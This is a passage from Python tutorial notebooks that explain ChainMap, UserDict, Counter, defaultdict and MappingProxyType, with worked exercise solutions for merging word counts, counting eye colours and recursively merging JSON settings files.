d3 = {'d':400, 'e': 5 }
d = ChainMap(d3, d)
print(d)

ChainMap({'d': 400, 'e': 5}, ChainMap({'a': 1, 'b': 2}, {'c': 3, 'd': 4}))


So the ordering of the maps in the chain matters!

Instead of adding an element to the beginning of the chain list using the technique above, we can also use the `new_child` method, which returns a new chain map with the new element added to the beginning of the list:

In [43]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = ChainMap(d1, d2)

In [44]:
d3 = {'d':400, 'e': 5 }
d = d.new_child(d3)
print(d)

ChainMap({'d': 400, 'e': 5}, {'a': 1, 'b': 2}, {'c': 3, 'd': 4})


And as you can see the key `d: 400` is in our chain map.

There is also a property that can be used to return every map in the chain **except** the first map:

In [45]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)
print(d)

ChainMap({'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6})


In [46]:
d = d.parents
print(d)

ChainMap({'c': 3, 'd': 4}, {'e': 5, 'f': 6})


The chain map's list of maps is accessible via the `maps` property:

In [47]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = ChainMap(d1, d2)

In [48]:
type(d.maps), d.maps

(list, [{'a': 1, 'b': 2}, {'c': 3, 'd': 4}])

As you can see this is a list, and so we can actually manipulate it as we would any list:

In [49]:
d3 = {'e': 5, 'f': 6}
d.maps.append(d3)

In [50]:
d.maps

[{'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6}]

We could equally well remove a map from the list entirely, insert one wherever we want, etc:

In [51]:
d.maps.insert(0, {'a': 100})

In [52]:
d.maps

[{'a': 100}, {'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6}]

In [53]:
print(list(d.items()))

[('d', 4), ('c', 3), ('f', 6), ('b', 2), ('a', 100), ('e', 5)]


As you can see `a` now has a value of `100` in the chain map.

We can also delete a map from the chain entirely:

In [54]:
del d.maps[1]

In [55]:
d.maps

[{'a': 100}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6}]

##### Example

A typical application of a chain map, apart from "merging" multiple dictionaries without incurring extra overhead copying the data, is to create a mutable version of merged dictionaries that does not mutate the underlying dictionaries.

Remember that mutating elements of a chain map mutates the elements of the first map in the list only.

Let's say we have a dictionary with some settings and we want to temporarily modify these settings, but without modifying the original dictionary.

We could certainly copy the dictionary and work with the copy, discarding the copy when we no longer need it - but again this incurs some overhead copying all the data.

Instead we can use a chain map this way, by making the first dictionary in the chain a new empty dictionary - any updates we make will be made to that dictionary only, thereby preserving the other dictionaries.

In [56]:
config = {
    'host': 'prod.deepdive.com',
    'port': 5432,
    'database': 'deepdive',
    'user_id': '$pg_user',
    'user_pwd': '$pg_pwd'
}

In [57]:
local_config = ChainMap({}, config)

In [58]:
list(local_config.items())

[('user_pwd', '$pg_pwd'),
 ('database', 'deepdive'),
 ('port', 5432),
 ('user_id', '$pg_user'),
 ('host', 'prod.deepdive.com')]

And we can make changes to `local_config`:

In [59]:
local_config['user_id'] = 'test'
local_config['user_pwd'] = 'test'

In [60]:
list(local_config.items())

[('host', 'prod.deepdive.com'),
 ('database', 'deepdive'),
 ('port', 5432),
 ('user_id', 'test'),
 ('user_pwd', 'test')]

But notice that our original dictionary is unaffected:

In [61]:
list(config.items())

[('host', 'prod.deepdive.com'),
 ('port', 5432),
 ('database', 'deepdive'),
 ('user_id', '$pg_user'),
 ('user_pwd', '$pg_pwd')]

That's because the changes we made were reflected in the **first** dictionary in the chain - that empty dictionary:

In [62]:
local_config.maps

[{'user_id': 'test', 'user_pwd': 'test'},
 {'host': 'prod.deepdive.com',
  'port': 5432,
  'database': 'deepdive',
  'user_id': '$pg_user',
  'user_pwd': '$pg_pwd'}]

##  UserDict

Suppose we want to create our own dictionary type that only allows real numbers for the values, and always returns the values as truncated integers.

We can do this simplistically, without using inheritance, by simply using a "backing" dictionary and implementing our getter and setter methods:

In [1]:
from numbers import Real

class IntDict:
    def __init__(self):
        self._d = {}
        
    def __setitem__(self, key, value):
        if not isinstance(value, Real):
            raise ValueError('Value must be a real number.')
        self._d[key] = value
        
    def __getitem__(self, key):
        return int(self._d[key])

In [2]:
d = IntDict()

In [3]:
d['a'] = 10.5

In [4]:
d['a']

10

In [5]:
d['a'] = 3 + 2j

ValueError: Value must be a real number.

The problem with this approach is that we have lost all the other functionality associated with dictionaries - for example, we cannot use the `get` method, or the `update` method, view objects, etc.

The solution here is to use inheritance. (I will cover OOP and inheritance in detail in Part 4 of this series, but wanted to point a few things out now).

When we inherit from a parent class, we get the functionality of the parent class, and override what we need to override.

In this case, we're going to inherit from the `dict` class, and override the `__setitem__` and `__getitem__` methods.

In [6]:
class IntDict(dict):
    def __setitem__(self, key, value):
        if not isinstance(value, Real):
            raise ValueError('Value must be a real number.')
        super().__setitem__(key, value)
        
    def __getitem__(self, key):
        return int(super().__getitem__(key))        

In [7]:
d = IntDict()
d['a'] = 10.5

In [8]:
d['a']

10

In [9]:
d['b'] = 'python'

ValueError: Value must be a real number.

So this works, and we also have all the functionality of dictionaries available to us as well - the only things that are different is that we have created overrides for `__setitem__` and `__getitem__`.

In [10]:
d['b'] = 100.5

In [11]:
d.keys()

dict_keys(['a', 'b'])

We even get the `get` method:

In [12]:
d.get('x', 'N/A')

'N/A'

In [13]:
d.get('a')

10.5

Hmmm... Why did we not get `10` back? We did override the `__getitem__` method after all...

Same problem with the `update` method:

In [14]:
d1 = {}
d1.update(d)

In [15]:
d1

{'a': 10.5, 'b': 100.5}

OK, so that does not work either.
What about merging another dictionary into our custom dictionary. Will that at least honor the override we put in place for the `__setitem__` method?

In [16]:
d.update({'x': 'python'})

In [17]:
d

ValueError: invalid literal for int() with base 10: 'python'

Nope... So using the getter and setter directly seems to work, but it looks like many other methods in the dictionary class that get and set values are not actually calling our `__getitem__` and `__setitem__` methods.

The problem is inheriting from these **built-in** types. They do not necessarily use the `__xxx__` methods that we use in our user defined types. For example, when we call `len('abc')`, it does not actually call the `___len__` method that exists in the string class. These special methods are used in our custom classes, but there's absolutely no guarantee that they get used by the built-ins.

And in fact that's exactly what's happening here - the `update` and `get` methods are not using the `__getitem__` method - if they were, our overrides would be called instead - but obviously they are not.

So, inheriting from `dict` works just fine, except when it doesn't!!!

Fortunately, this is where the `UserDict` can help us.

Provided as part of the standard library (in the `collections` module) it allows us to create custom dictionary objects and enjoy the normal inheritance behavior we would expect from non built-in types.

Let's try it out with our example:

In [18]:
from collections import UserDict

In [19]:
help(UserDict)

Help on class UserDict in module collections:

class UserDict(collections.abc.MutableMapping)
 |  Method resolution order:
 |      UserDict
 |      collections.abc.MutableMapping
 |      collections.abc.Mapping
 |      collections.abc.Collection
 |      collections.abc.Sized
 |      collections.abc.Iterable
 |      collections.abc.Container
 |      builtins.object
 |  
 |  Methods defined here:
 |  
 |  __contains__(self, key)
 |      # Modify __contains__ to work correctly when __missing__ is present
 |  
 |  __delitem__(self, key)
 |  
 |  __getitem__(self, key)
 |  
 |  __init__(*args, **kwargs)
 |      Initialize self.  See help(type(self)) for accurate signature.
 |  
 |  __iter__(self)
 |  
 |  __len__(self)
 |  
 |  __repr__(self)
 |      Return repr(self).
 |  
 |  __setitem__(self, key, item)
 |  
 |  copy(self)
 |  
 |  ----------------------------------------------------------------------
 |  Class methods defined here:
 |  
 |  fromkeys(iterable, value=None) from abc.ABCMet

As you can see, the methods we would expect from regular `dicts` seem to be present in the `UserDict` class. 
Let's build a custom dictionary type using it:

In [20]:
class IntDict(UserDict):
    def __setitem__(self, key, value):
        if not isinstance(value, Real):
            raise ValueError('Value must be a real number.')
        super().__setitem__(key, value)
        
    def __getitem__(self, key):
        return int(super().__getitem__(key))        

In [21]:
d = IntDict()

In [22]:
d['a'] = 10.5
d['b'] = 100.5

In [23]:
d['c'] = 'python'

ValueError: Value must be a real number.

In [24]:
d.get('a')

10

Nice! The `get` method called our override method.
What about the `update` method?

In [25]:
d1 = {}
d1.update(d)

In [26]:
d1

{'a': 10, 'b': 100}

Yes! That worked too.

Moreover, we can recover the underlying `dict` object from the `UserDict` objects:

In [27]:
d.data

{'a': 10.5, 'b': 100.5}

In [28]:
isinstance(d.data, dict)

True

In fact, we can also use the initializer that `UserDict` provides us:

In [29]:
d2 = IntDict(a=10)
d2

{'a': 10}

In [30]:
d1 = IntDict({'a': 1.1, 'b': 2.2, 'c': 3.3})

In [31]:
d1

{'a': 1.1, 'b': 2.2, 'c': 3.3}

You'll notice that the representation here lists the original values - that is correct, since to recreate the exact object we would need to use these values, not the truncated integers returned by `__getitem__`.

However, if we retrieve the items:

In [32]:
d1['a'], d1['b'], d1['c']

(1, 2, 3)

What if we try to create an instance with an incorrect value type:

In [33]:
d2 = IntDict({'a': 'python'})

ValueError: Value must be a real number.

That works too - so even the initializer is using our overridden `__setitem__` method.

In fact, this even works if we try merging another dictionary into our custom integer dictionary:

In [34]:
d1

{'a': 1.1, 'b': 2.2, 'c': 3.3}

In [35]:
d1.update({'a': 'python'})

ValueError: Value must be a real number.

So as you can see, subclassing `UserDict` is preferrable to subclassing `dict` - the inheritance behaves more like we would expect with inheritance of user defined classes. The bottom line is that the built-ins are written in C, and make no guarantee as to whether they use these special methods at all.

#### Example

Let's suppose we want to write a custom dictionary where keys can only be from a limited specified set of keys, and the values must be integers from 0-255.

We can attempt to do this in a more general form as follows:

In [36]:
class LimitedDict(UserDict):
    def __init__(self, keyset, min_value, max_value, *args, **kwargs):
        self._keyset = keyset
        self._min_value = min_value
        self._max_value = max_value
        super().__init__(*args, **kwargs)
        
    def __setitem__(self, key, value):
        if key not in self._keyset:
            raise KeyError('Invalid key name.')
        if not isinstance(value, int):
            raise ValueError('Value must be an integer type.')
        if value < self._min_value or value > self._max_value:
            raise ValueError(f'Value must be between {self._min_value} and {self._max_value}')
        super().__setitem__(key, value)

In [37]:
d = LimitedDict({'red', 'green', 'blue'}, 0, 255, red=10, green=10, blue=10)

In [38]:
d

{'red': 10, 'green': 10, 'blue': 10}

In [39]:
d['red'] = 200

In [40]:
d

{'red': 200, 'green': 10, 'blue': 10}

In [41]:
d['purple'] = 100

KeyError: 'Invalid key name.'

and, similarly we also have bounded key values:

In [42]:
d['red'] = 300

ValueError: Value must be between 0 and 255

# Section 10 - Coding Exercises

##  Exercise 1 - Solution

Let's revisit an exercise we did right after the section on dictionaries.

You have text data spread across multiple servers. Each server is able to analyze this data and return a dictionary that contains words and their frequency.

Your job is to combine this data to create a single dictionary that contains all the words and their combined frequencies from all these data sources. Bonus points if you can make your dictionary sorted by frequency (highest to lowest).

For example, you may have three servers that each return these dictionaries:

In [1]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

Your resulting dictionary should look like this:

In [2]:
d = {'python': 17,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10,
     'go': 9,
     'erlang': 5,
     'haskell': 2,
     'pascal': 1}

If only servers 1 and 2 return data (so d1 and d2), your results would look like:

In [3]:
d = {'python': 16,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10, 
     'go': 9}

This was one solution to the problem:

In [4]:
def merge(*dicts):
    unsorted = {}
    for d in dicts:
        for k, v in d.items():
            unsorted[k] = unsorted.get(k, 0) + v
            
    # create a dictionary sorted by value
    return dict(sorted(unsorted.items(), key=lambda e: e[1], reverse=True))

Implement two different solutions to this problem:

**a**: Using `defaultdict` objects

**b**: Using `Counter` objects

##### Solution a

Using `defaultdict` objects does not greatly simplify the problem, but at least we can get rid of the `get` logic:

In [5]:
from collections import defaultdict

def merge(*dicts):
    unsorted = defaultdict(int)
    for d in dicts:
        for k, v in d.items():
            unsorted[k] += v
            
    # create a dictionary sorted by value
    return dict(sorted(unsorted.items(), key=lambda e: e[1], reverse=True))

In [6]:
merge(d1, d2)

{'python': 16, 'javascript': 15, 'java': 13, 'c#': 12, 'c++': 10, 'go': 9}

In [7]:
merge(d1, d2, d3)

{'python': 17,
 'javascript': 15,
 'java': 13,
 'c#': 12,
 'c++': 10,
 'go': 9,
 'erlang': 5,
 'haskell': 2,
 'pascal': 1}

##### Solution b

Now that we know about the `Counter` class however, this problem is trivial:

In [8]:
from collections import Counter

def merge(*dicts):
    unsorted = Counter()
    for d in dicts:
        unsorted.update(d)
    
    return unsorted

In [9]:
print(merge(d1, d2))

Counter({'python': 16, 'javascript': 15, 'java': 13, 'c#': 12, 'c++': 10, 'go': 9})


In [10]:
print(merge(d1, d2, d3))

Counter({'python': 17, 'javascript': 15, 'java': 13, 'c#': 12, 'c++': 10, 'go': 9, 'erlang': 5, 'haskell': 2, 'pascal': 1})


Now, the only thing still missing is the fact that even though the counters may sometimes (pure luck!) appear sorted, they are not guaranteed to be so. For example, let's add `d4` as follows:

In [11]:
d4 = {'modula-2': 100}

In [12]:
merge(d1, d2, d3, d4)

Counter({'python': 17,
         'java': 13,
         'c#': 12,
         'javascript': 15,
         'c++': 10,
         'go': 9,
         'erlang': 5,
         'haskell': 2,
         'pascal': 1,
         'modula-2': 100})

As you can see, this is not sorted by frequency.

We could use the same technique we used before to sort the dictionary, but here I just want to show you an alternative.

The `Counter` objects have a method called `most_common`. We can use that method, without an argument to return all the freuqncies sorted from highest to lowest:

In [13]:
result = merge(d1, d2, d3, d4)

In [14]:
result.most_common()

[('modula-2', 100),
 ('python', 17),
 ('javascript', 15),
 ('java', 13),
 ('c#', 12),
 ('c++', 10),
 ('go', 9),
 ('erlang', 5),
 ('haskell', 2),
 ('pascal', 1)]

Only thing is we need to make this into a dictionary:

In [15]:
dict(result.most_common())

{'modula-2': 100,
 'python': 17,
 'javascript': 15,
 'java': 13,
 'c#': 12,
 'c++': 10,
 'go': 9,
 'erlang': 5,
 'haskell': 2,
 'pascal': 1}

So, let's finalize our function:

In [16]:
from collections import Counter

def merge(*dicts):
    result = Counter()
    for d in dicts:
        result.update(d)
    
    return dict(result.most_common())

In [17]:
merge(d1, d2, d3, d4)

{'modula-2': 100,
 'python': 17,
 'javascript': 15,
 'java': 13,
 'c#': 12,
 'c++': 10,
 'go': 9,
 'erlang': 5,
 'haskell': 2,
 'pascal': 1}

##  Exercise 2 - Solution

Suppose you have a list of all possible eye colors:

In [1]:
eye_colors = ("amber", "blue", "brown", "gray", "green", "hazel", "red", "violet")

Some other collection (say recovered from a database, or an external API) contains a list of `Person` objects that have an eye color property.

Your goal is to create a dictionary that contains the number of people that have the eye color as specified in `eye_colors`. The wrinkle here is that even if no one matches some eye color, say `amber`, your dictionary should still contain an entry `"amber": 0`.

Here is some sample data:

In [2]:
class Person:
    def __init__(self, eye_color):
        self.eye_color = eye_color

In [3]:
from random import seed, choices
seed(0)
persons = [Person(color) for color in choices(eye_colors[2:], k = 50)]

As you can see we built up a list of `Person` objects, none of which should have `amber` or `blue` eye colors

Write a function that returns a dictionary with the correct counts for each eye color listed in `eye_colors`.

We're going to use the `Counter` class for this problem.
However, simply counting the eye colors in the `person` list is not going to be quite enough:

In [4]:
from collections import Counter

In [5]:
counts = Counter(p.eye_color for p in persons)

In [6]:
counts

Counter({'violet': 12,
         'red': 10,
         'green': 8,
         'gray': 10,
         'hazel': 7,
         'brown': 3})

As you can see we do not have entries for `amber` and `blue` for example.

We could approach this in one of two ways:
1. add zero count key/value pairs after the counting has occurred
2. or, pre-initialize the `Counter` object with all the possible eye colors set to a count of `0`.

Let's try the first approach:

In [7]:
counts = Counter(p.eye_color for p in persons)

In [8]:
result = {color: counts.get(color, 0) for color in eye_colors}

In [9]:
result

{'amber': 0,
 'blue': 0,
 'brown': 3,
 'gray': 10,
 'green': 8,
 'hazel': 7,
 'red': 10,
 'violet': 12}

And now the second approach, where we initialize our Counter object with zero counts for each eye color first, and **then** do the counting:

In [10]:
counts = Counter({color: 0 for color in eye_colors})

In [11]:
counts

Counter({'amber': 0,
         'blue': 0,
         'brown': 0,
         'gray': 0,
         'green': 0,
         'hazel': 0,
         'red': 0,
         'violet': 0})

As you can see we have each color with a count of zero - now we simply update the counter based on the results in the `persons` list:

In [12]:
counts.update(p.eye_color for p in persons)

In [13]:
counts

Counter({'amber': 0,
         'blue': 0,
         'brown': 3,
         'gray': 10,
         'green': 8,
         'hazel': 7,
         'red': 10,
         'violet': 12})

Finally, let's package up one of those solutions into a function:

In [14]:
def count_eye_colors(persons, possible_eye_colors):
    counts = Counter({color: 0 for color in possible_eye_colors})
    counts.update(p.eye_color for p in persons)
    return counts

which we can then call like this:

In [15]:
count_eye_colors(persons, eye_colors)

Counter({'amber': 0,
         'blue': 0,
         'brown': 3,
         'gray': 10,
         'green': 8,
         'hazel': 7,
         'red': 10,
         'violet': 12})

##  Exercises

#### Exercise #1

Let's revisit an exercise we did right after the section on dictionaries.

You have text data spread across multiple servers. Each server is able to analyze this data and return a dictionary that contains words and their frequency.

Your job is to combine this data to create a single dictionary that contains all the words and their combined frequencies from all these data sources. Bonus points if you can make your dictionary sorted by frequency (highest to lowest).

For example, you may have three servers that each return these dictionaries:

In [1]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

Your resulting dictionary should look like this:

In [2]:
d = {'python': 17,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10,
     'go': 9,
     'erlang': 5,
     'haskell': 2,
     'pascal': 1}

If only servers 1 and 2 return data (so d1 and d2), your results would look like:

In [3]:
d = {'python': 16,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10, 
     'go': 9}

This was one solution to the problem:

In [4]:
def merge(*dicts):
    unsorted = {}
    for d in dicts:
        for k, v in d.items():
            unsorted[k] = unsorted.get(k, 0) + v
            
    # create a dictionary sorted by value
    return dict(sorted(unsorted.items(), key=lambda e: e[1], reverse=True))

Implement two different solutions to this problem:

**a**: Using `defaultdict` objects

**b**: Using `Counter` objects

---

#### Exercise #2

Suppose you have a list of all possible eye colors:

In [5]:
eye_colors = ("amber", "blue", "brown", "gray", "green", "hazel", "red", "violet")

Some other collection (say recovered from a database, or an external API) contains a list of `Person` objects that have an eye color property.

Your goal is to create a dictionary that contains the number of people that have the eye color as specified in `eye_colors`. The wrinkle here is that even if no one matches some eye color, say `amber`, your dictionary should still contain an entry `"amber": 0`.

Here is some sample data:

In [6]:
class Person:
    def __init__(self, eye_color):
        self.eye_color = eye_color

In [7]:
from random import seed, choices
seed(0)
persons = [Person(color) for color in choices(eye_colors[2:], k = 50)]

As you can see we built up a list of `Person` objects, none of which should have `amber` or `blue` eye colors

Write a function that returns a dictionary with the correct counts for each eye color listed in `eye_colors`.

---

#### Exercise #3

You are given three JSON files, representing a default set of settings, and environment specific settings.
The files are included in the downloads, and are named:
* `common.json`
* `dev.json`
* `prod.json`

Your goal is to write a function that has a single argument (the environment name) and returns the "combined" dictionary that merges the two dictionaries together, with the environment specific settings overriding any common settings already defined.

For simplicity, assume that the argument values are going to be the same as the file names, without the `.json` extension. So for example, `dev` or `prod`.

The wrinkle: We don't want to duplicate data for the "merged" dictionary - use `ChainMap` to implement this instead.

##  Exercise 3 - Solution

You are given three JSON files, representing a default set of settings, and environment specific settings.
The files are included in the downloads, and are named:
* `common.json`
* `dev.json`
* `prod.json`

Your goal is to write a function that has a single argument, the environment name, and returns the "combined" dictionary that merges the two dictionaries together, with the environment specific settings overriding any common settings already defined.

For simplicity, assume that the argument values are going to be the same as the file names, without the `.json` extension. So for example, `dev` or `prod`.

The wrinkle: We don't want to duplicate data for the "merged" dictionary - use `ChainMap` to implement this instead.

The first thing we'll need to do is write a function to load the JSON files:

In [1]:
import json

def load_settings(env):
    # assume file name is <env>.json
    with open(f'{env}.json') as f:
        settings = json.load(f)
    return settings

In [2]:
from pprint import pprint

In [3]:
pprint(load_settings('common'))

{'data': {'input_root': '/default/path/inputs',
          'numerics': {'precision': 6, 'type': 'Decimal'},
          'output_root': '/default/path/outputs'},
 'database': {'db_name': 'deepdive', 'port': 5432, 'schema': 'public'},
 'logs': {'format': '%(asctime)s: %(levelname)s: %(clientip)s %(user)s '
                    '%(message)s',
          'level': 'info'}}


In [4]:
pprint(load_settings('dev'))

{'data': {'input_root': '/dev/path/inputs',
          'numerics': {'type': 'float'},
          'operators': {'add': '__add__'},
          'output_root': '/dev/path/outputs'},
 'database': {'pwd': 'test', 'user': 'test'},
 'logs': {'format': '%(asctime)s: %(levelname)s: %(clientip)s %(user)s '
                    '%(filename)s %(funcName)s %(message)s',
          'level': 'trace'}}


In [5]:
pprint(load_settings('prod'))

{'data': {'input_root': '$DATA_INPUT_PATH', 'output_root': '$DATA_OUTPUT_PATH'},
 'database': {'pwd': '$PG_PWD', 'user': '$PG_USER'}}


OK, so our function seems to work fine.
Now time to "combine" our settings - let's try this simple approach first.

Spoiler alert: this won't work as expected!

In [6]:
from collections import ChainMap

def settings(env):
    # combine common.json and <env>.json, with env settings taking precedence
    common_settings = load_settings('common')
    env_settings = load_settings(env)
    return ChainMap(env_settings, common_settings)

In [7]:
dev = settings('dev')

In [8]:
for k, v in dev.items():
    print(k, ':', v)

data : {'input_root': '/dev/path/inputs', 'output_root': '/dev/path/outputs', 'numerics': {'type': 'float'}, 'operators': {'add': '__add__'}}
logs : {'level': 'trace', 'format': '%(asctime)s: %(levelname)s: %(clientip)s %(user)s %(filename)s %(funcName)s %(message)s'}
database : {'user': 'test', 'pwd': 'test'}


**What happened to the values that were in `common`??**

For example, we don't see the `database` `port`??

This does not work as intended because of sub-dictionaries - as you can see the dictionary for `database` for example is the one from `dev`, and not a "combined" dictionary.

`ChainMap` is not recursive, so this is not going to work for us as it stands.

We need to use a recursive approach to handle any amount of nesting.

Let's think how we would do this for a single level.

When we chain two dictionaries together, we will have to replace any sub-dictionary with a chain of the sub-dictionaries further down the line - fortunately our line is two, since we only deal with `common` and either `dev` or `prod` (or whatever environment names we want to support).

So if a key in `dev` (for example), has a dictionary value, we need to chain that sub-dictionary too. And if any of the keys in the chained-subdictionary contains nested dictionaries, we need to chain those too.

In [9]:
def chain_recursive(d1, d2):
    chain = ChainMap(d1, d2)
    for k, v in d1.items():
        if isinstance(v, dict) and k in d2:
            chain[k] = chain_recursive(d1[k], d2[k])
    return chain

In [10]:
d1 = load_settings('common')
d2 = load_settings('dev')

In [11]:
dev = chain_recursive(d2, d1)

In [12]:
pprint(dev)

ChainMap({'data': ChainMap({'input_root': '/dev/path/inputs',
                            'numerics': ChainMap({'type': 'float'},
                                                 {'precision': 6,
                                                  'type': 'Decimal'}),
                            'operators': {'add': '__add__'},
                            'output_root': '/dev/path/outputs'},
                           {'input_root': '/default/path/inputs',
                            'numerics': {'precision': 6, 'type': 'Decimal'},
                            'output_root': '/default/path/outputs'}),
          'database': ChainMap({'pwd': 'test', 'user': 'test'},
                               {'db_name': 'deepdive',
                                'port': 5432,
                                'schema': 'public'}),
          'logs': ChainMap({'format': '%(asctime)s: %(levelname)s: '
                                      '%(clientip)s %(user)s %(filename)s '
                              

This means that we can lookup the log level for example, which we know should be `trace` for our development environment:

In [13]:
dev['logs']['level']

'trace'

If instead we load up our production environment:

In [14]:
d3 = load_settings('prod')
prod = chain_recursive(d3, d1)

In [15]:
prod['logs']['level']

'info'

and the database port, from the common settings:

In [16]:
prod['database']['port']

5432

but, we have the override for the user:

In [17]:
prod['database']['user']

'$PG_USER'

So now, let's package this up in a neat function for our users:

In [18]:
def settings(env):
    common_settings = load_settings('common')
    env_settings = load_settings(env)
    return chain_recursive(env_settings, common_settings)

In [19]:
prod = settings('prod')

In [20]:
prod['database']['user']

'$PG_USER'

In [21]:
dev = settings('dev')
dev['logs']['level']

'trace'

Let's also check some deeper nested dictionaries:

In [22]:
prod['data']['numerics']['type']

'Decimal'

In [23]:
dev['data']['numerics']['type']

'float'

In [24]:
dev['data']['operators']

{'add': '__add__'}

So this seems to work just fine. You may want to further refine this to merge list type values as well - for example, `key1: [1, 2, 3]` in `common` and `key2: [3, 4, 5]` in `dev` might result in `key1: [1, 2, 3, 4, 5]`. This is a rarer requirement, but do note that the solution I present here will simply replace the entire list with what is in the `dev` file, not merge the two lists.

# Section 11 - Extras

##  MappingProxyType

The mapping proxy type is an easy way to create a read-only **view** of any dictionary.

This can be handy if you want to pass a dictionary around, and have that view reflect the underlying dictionary (even if it is mutated), but not allow the receiver to be able to modify the dictionary.

In fact, this is used by classes all the time:

In [1]:
class Test:
    a = 100

In [2]:
Test.__dict__

mappingproxy({'__module__': '__main__',
              'a': 100,
              '__dict__': <attribute '__dict__' of 'Test' objects>,
              '__weakref__': <attribute '__weakref__' of 'Test' objects>,
              '__doc__': None})

As you can see, what is returned here is not actually a `dict` object, but a `mappingproxy`.

To create a mapping proxy from a dictionary we use the `MappingProxyType` from the `types` module:

In [3]:
from types import MappingProxyType

In [4]:
d = {'a': 1, 'b': 2}

In [5]:
mp = MappingProxyType(d)

This mapping proxy still behaves like a dictionary:

In [6]:
list(mp.keys())

['a', 'b']

In [7]:
list(mp.values())

[1, 2]

In [8]:
list(mp.items())

[('a', 1), ('b', 2)]

In [9]:
mp.get('a', 'not found')

1

In [10]:
mp.get('c', 'not found')

'not found'

But we cannot mutate it:

In [11]:
try:
    mp['a'] = 100
except TypeError as ex:
    print('TypeError: ', ex)

TypeError:  'mappingproxy' object does not support item assignment


On the other hand, if the underlying dictionary is mutated:

In [12]:
d['a'] = 100
d['c'] = 'new item'

In [13]:
d

{'a': 100, 'b': 2, 'c': 'new item'}

In [14]:
mp

mappingproxy({'a': 100, 'b': 2, 'c': 'new item'})

And as you can see, the mapping proxy "sees" the changes in the undelying dictionary - so it behaves like a view, in the same way `keys()`, `values()` and `items()` do.

You can obtain a **shallow** copy of the proxy by using the `copy()` method:

In [15]:
cp = mp.copy()

In [16]:
cp

{'a': 100, 'b': 2, 'c': 'new item'}

As you can see, `cp` is a plain `dict`.